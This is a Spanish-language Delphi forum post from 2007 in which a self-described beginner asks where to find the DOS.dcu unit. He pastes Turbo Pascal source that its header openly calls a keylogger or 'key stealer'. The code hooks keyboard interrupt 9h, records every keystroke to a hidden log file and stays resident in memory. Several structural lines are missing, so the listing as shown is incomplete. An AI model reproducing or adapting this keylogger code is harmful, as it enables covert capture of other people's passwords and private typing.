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Antiguo 05-11-2007
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jorgegetafe jorgegetafe is offline
Registrado: dic 2006
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jorgegetafe Va por buen camino
Para utilizar el siguiente código que sale en los enlaces que me has propuesto, necesito la unidad "DOS.dcu" ¿donde puedo conseguirla?
Código Delphi [-]
     This is Key-logger program (key Recorder/key stealer),
     written in Turbo Pascal 7 .
     to see the best result, run the file from "windows 9x MS-DOS Prompt"
     i think "command prompt" will crash and hang!
     as i test in "MS-DOS Prompt",it is perfect with no error!
     By: Afshin Zavar
    Please send me any bugs,suggestions,updated version and misspelling *)
{$F+}                        (* enable far call (out of our Segments) *)
{$M $3200,0,1000}            {stack:=3200h,MinHeap:=0 and MaxHeap:=1000}
{$S-,R-}                     {disable stack overflow and range checking}
uses CRT,DOS;                {units}
var                          (* Global varibles (avalible in all our code) *)
 oldint9:Procedure;          {wanna save real int9h address}
 KeyScanCode:Byte;           {scan code of keys}
 KeyChar:String;             {name of keys}
 FP:Text;                    {file of text}
{***************[ This is new int.9 and will be resident ]*********************}
Procedure KeyPress;Interrupt;     { allways must be contain  "interrupt" }
      mem[0:4]:=$AA;              { mark RAM }
      Append(fp);                 { Add more text onto end of file}
      KeyScanCode:=Port[$60];     { read key from Port 60h }
      Case KeyScanCode of         {check that which key pressed}
          1:KeyChar:='Esc ';
          2:KeyChar:='1 ';
          3:KeyChar:='2 ';
          4:KeyChar:='3 ';
          5:KeyChar:='4 ';
          6:KeyChar:='5 ';
          7:KeyChar:='6 ';
          8:KeyChar:='7 ';
          9:KeyChar:='8 ';
          10:KeyChar:='9 ';
          11:KeyChar:='0 ';
          12:KeyChar:='- ';
          13:KeyChar:='= ';
          14:KeyChar:='Bksp ';
          15:KeyChar:='Tab ';
          16:KeyChar:='Q ';
          17:KeyChar:='W ';
          18:KeyChar:='E ';
          19:KeyChar:='R ';
          20:KeyChar:='T ';
          21:KeyChar:='Y ';
          22:KeyChar:='U ';
          23:KeyChar:='I ';
          24:KeyChar:='O ';
          25:KeyChar:='P ';
          26:KeyChar:='[ ';
          27:KeyChar:='] ';
          28:KeyChar:='Enter ';
          29:KeyChar:='Ctrl ';
          30:KeyChar:='A ';
          31:KeyChar:='S ';
          32:KeyChar:='D ';
          33:KeyChar:='F ';
          34:KeyChar:='G ';
          35:KeyChar:='H ';
          36:KeyChar:='J ';
          37:KeyChar:='K ';
          38:KeyChar:='L ';
          39:KeyChar:='; ';
          40:KeyChar:='coma ';
          41:KeyChar:='` ';
          42:KeyChar:='LShift ';
          43:KeyChar:='\ ';
          44:KeyChar:='Z ';
          45:KeyChar:='X ';
          46:KeyChar:='C ';
          47:KeyChar:='V ';
          48:KeyChar:='B ';
          49:KeyChar:='N ';
          50:KeyChar:='M ';
          51:KeyChar:=', ';
          52:KeyChar:='. ';
          53:KeyChar:='/ ';
          54:KeyChar:='RShift ';
          55:KeyChar:='* ';
          56:KeyChar:='Alt ';
          57:KeyChar:='Space ';
          58:KeyChar:='CapsLock ';
          59:KeyChar:='F1 ';
          60:KeyChar:='F2 ';
          61:KeyChar:='F3 ';
          62:KeyChar:='F4 ';
          63:KeyChar:='F5 ';
          64:KeyChar:='F6 ';
          65:KeyChar:='F7 ';
          66:KeyChar:='F8 ';
          67:KeyChar:='F9 ';
          68:KeyChar:='F10 ';
          133:KeyChar:='F11 ';
          134:KeyChar:='F12 ';
          69:KeyChar:='NumLock ';
          70:KeyChar:='Scroll Lock ';
          71:KeyChar:='Home(7) ';
          72:KeyChar:='UP(8) ';
          73:KeyChar:='PgUp(9) ';
          74:KeyChar:='Gray - ';
          75:KeyChar:='Left(4) ';
          76:KeyChar:='Center(5) ';
          77:KeyChar:='Right(6) ';
          78:KeyChar:='Gray + ';
          79:KeyChar:='End(1) ';
          80:KeyChar:='Down(2) ';
          81:KeyChar:='PgDn(3) ';
          82:KeyChar:='Ins(0) ';
          83:KeyChar:='Del(.) ';
     End; {case}
     WriteLn(fp,KeyChar);     {write Key Name to file}
     Close(fp);               {close file}
                    (* now pass control of int9h to Operating System *)
   Inline ($9C);             {pushf}
   OldInt9;                  {call real int9 and then popf}
{****************[Main Body]*************************}
    if mem[0:4]=$AA then                {test our mark in RAM}
        writeln(#13,#10,'This program has been allready installed.');
        halt(0)                        {return ro the Operating system}  
    writeln(#13,#10,'KeyLogger Program Installed successfully!',#13,#10);
   Assign(fp,'\keylist.log');         {wanna to open file}
   Rewrite(fp);                       {Creates and opens a new file.}
   Close(fp);                         {close opened file}
   GetIntVec($9,@OldInt9);            {save real interrupt no.9h}
   SetIntVec($9,Addr(KeyPress));      {hook and change interrupt no.9h to our procedure }
   Keep(0);                           {Be TSR} 
Explicate como si fuese tonto, soy nuevo en esto de hacer programas!!!! XD
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